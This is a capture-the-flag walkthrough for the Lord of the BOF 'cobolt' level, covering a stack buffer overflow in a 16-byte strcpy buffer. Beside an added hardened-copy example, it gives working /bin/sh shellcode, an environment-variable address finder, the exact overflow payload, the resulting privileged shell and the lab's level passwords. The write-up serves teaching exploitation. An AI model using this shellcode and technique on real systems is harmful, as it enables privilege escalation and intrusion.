Skipping gate ㅠㅠ
id : gremlin
pw : hello bof world
# cobolt source
```
[gremlin@localhost gremlin]$ cat cobolt.c
/*
The Lord of the BOF : The Fellowship of the BOF
- cobolt
- small buffer
*/
int main(int argc, char *argv[])
{
char buffer[16];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[gremlin@localhost gremlin]$
```
Unlike gate, the buffer size has shrunk to 16 bytes.
# cobolt disassembly
```
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>: push %ebp
0x8048431 <main+1>: mov %esp,%ebp
0x8048433 <main+3>: sub $0x10,%esp
0x8048436 <main+6>: cmpl $0x1,0x8(%ebp)
0x804843a <main+10>: jg 0x8048453 <main+35>
0x804843c <main+12>: push $0x80484d0
0x8048441 <main+17>: call 0x8048350 <printf>
0x8048446 <main+22>: add $0x4,%esp
0x8048449 <main+25>: push $0x0
0x804844b <main+27>: call 0x8048360 <exit>
0x8048450 <main+32>: add $0x4,%esp
0x8048453 <main+35>: mov 0xc(%ebp),%eax
0x8048456 <main+38>: add $0x4,%eax
0x8048459 <main+41>: mov (%eax),%edx
0x804845b <main+43>: push %edx
0x804845c <main+44>: lea 0xfffffff0(%ebp),%eax
0x804845f <main+47>: push %eax
0x8048460 <main+48>: call 0x8048370 <strcpy>
0x8048465 <main+53>: add $0x8,%esp
0x8048468 <main+56>: lea 0xfffffff0(%ebp),%eax
0x804846b <main+59>: push %eax
0x804846c <main+60>: push $0x80484dc
0x8048471 <main+65>: call 0x8048350 <printf>
0x8048476 <main+70>: add $0x8,%esp
0x8048479 <main+73>: leave
0x804847a <main+74>: ret
0x804847b <main+75>: nop
0x804847c <main+76>: nop
0x804847d <main+77>: nop
0x804847e <main+78>: nop
0x804847f <main+79>: nop
End of assembler dump.
```
The frame reserves exactly 0x10 = 16 bytes for the buffer (`sub $0x10,%esp`), so the stack looks like this, from high to low addresses:

```
RET[4]     |
SFP[4]     |
Buffer[16] |
```
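The diagram above is the whole story of the bug: `strcpy` has no idea the destination is 16 bytes, so anything past byte 16 walks over SFP and then RET. As an added example (not from the original post or from the Lord of the BOF source), here is the same program pattern beside a bounded copy that refuses an argument that would not fit. `ret_offset_for` encodes the layout the post draws (buffer, then 4-byte SFP, then RET) for a 32-bit frame with no padding, which matches the `sub $0x10,%esp` above; `bounded_copy` and `cobolt_hardened` are names chosen here.

```c
/* Added example: the cobolt pattern (unbounded strcpy into a 16-byte
 * stack buffer) beside a length-checked copy.  All names are ours. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16          /* same buffer size as cobolt.c */

/* Frame layout from the post: Buffer[N] | SFP[4] | RET[4] (i386, no
 * padding).  Returns the byte offset from the start of the buffer at
 * which the saved return address begins: for N = 16 that is 20, which
 * is why the post's input is 20 filler bytes followed by a 4-byte address. */
size_t ret_offset_for(size_t buffer_size)
{
    return buffer_size + 4;  /* 4 = size of the saved frame pointer on i386 */
}

/* Hardened replacement for strcpy(buffer, argv[1]):
 * returns 0 and copies src (with its NUL) if it fits in dst_size bytes,
 * otherwise returns -1 and leaves dst untouched. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)   /* need room for the NUL too */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Mirrors cobolt's main() body, but an argument longer than 15 bytes is
 * rejected instead of overwriting SFP and RET.  Returns 0 if the
 * argument was accepted and printed, -1 if it was rejected. */
int cobolt_hardened(const char *arg)
{
    char buffer[BUF_SIZE];
    if (bounded_copy(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return -1;
    }
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    return cobolt_hardened(argv[1]) == 0 ? 0 : 1;
}
```

Run it with the post's 24-byte argument (`./hardened $(python -c 'print "\x90"*20+"AAAA"')`) and it exits with the "argument too long" message; a 15-character argument is echoed as before. The point is that the check lives next to the copy and uses `sizeof buffer`, so it cannot drift out of sync with the buffer declaration the way a separately maintained constant can.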
- After exporting SHELLCODE, `env` (which prints the environment variable list) shows that SHELLCODE went in correctly (the raw bytes render as garbage in the terminal):
```
[gremlin@localhost gremlin]$ export SHELLCODE=`python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[gremlin@localhost gremlin]$ env
PWD=/home/gremlin
REMOTEHOST=192.168.75.1
HOSTNAME=localhost.localdomain
LESSOPEN=|/usr/bin/lesspipe.sh %s
USER=gremlin
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
MACHTYPE=i386-redhat-linux-gnu
MAIL=/var/spool/mail/gremlin
INPUTRC=/etc/inputrc
SHELLCODE=1h//shh/bin⏓ኂ°
̀
BASH_ENV=/home/gremlin/.bashrc
LANG=en_US
DISPLAY=192.168.75.1:0.0
LOGNAME=gremlin
SHLVL=2
USERNAME=
SHELL=/bin/bash
HOSTTYPE=i386
HISTSIZE=1000
OSTYPE=linux-gnu
TERM=xterm
HOME=/home/gremlin
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gremlin/bin
_=/usr/bin/env
```
- Write a small program to find the address of the SHELLCODE variable registered in the environment.
# getenv.c

```c
#include <stdio.h>
#include <stdlib.h>   /* getenv() */

int main(void) {
    /* Print the address at which SHELLCODE sits in this process's environment */
    printf("%p\n", (void *)getenv("SHELLCODE"));
    return 0;
}
```
- Compile and run it, and the address is printed.
```
[gremlin@localhost gremlin]$ gcc -o getenv getenv.c
[gremlin@localhost gremlin]$ ./getenv
0xbffffecb
```
- Fill Buffer and SFP (20 bytes) with NOPs, then append the 4-byte address that lands in RET:
```
./cobolt `python -c 'print "\x90"*20+"\xcb\xfe\xff\xbf"'`
```

```
[gremlin@localhost gremlin]$ ./getenv
0xbffffecb
[gremlin@localhost gremlin]$ ./cobolt `python -c 'print "\x90"*20+"\xcb\xfe\xff\xbf"'`
?y¿
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
bash$ my-pass
euid = 502
hacking exposed
```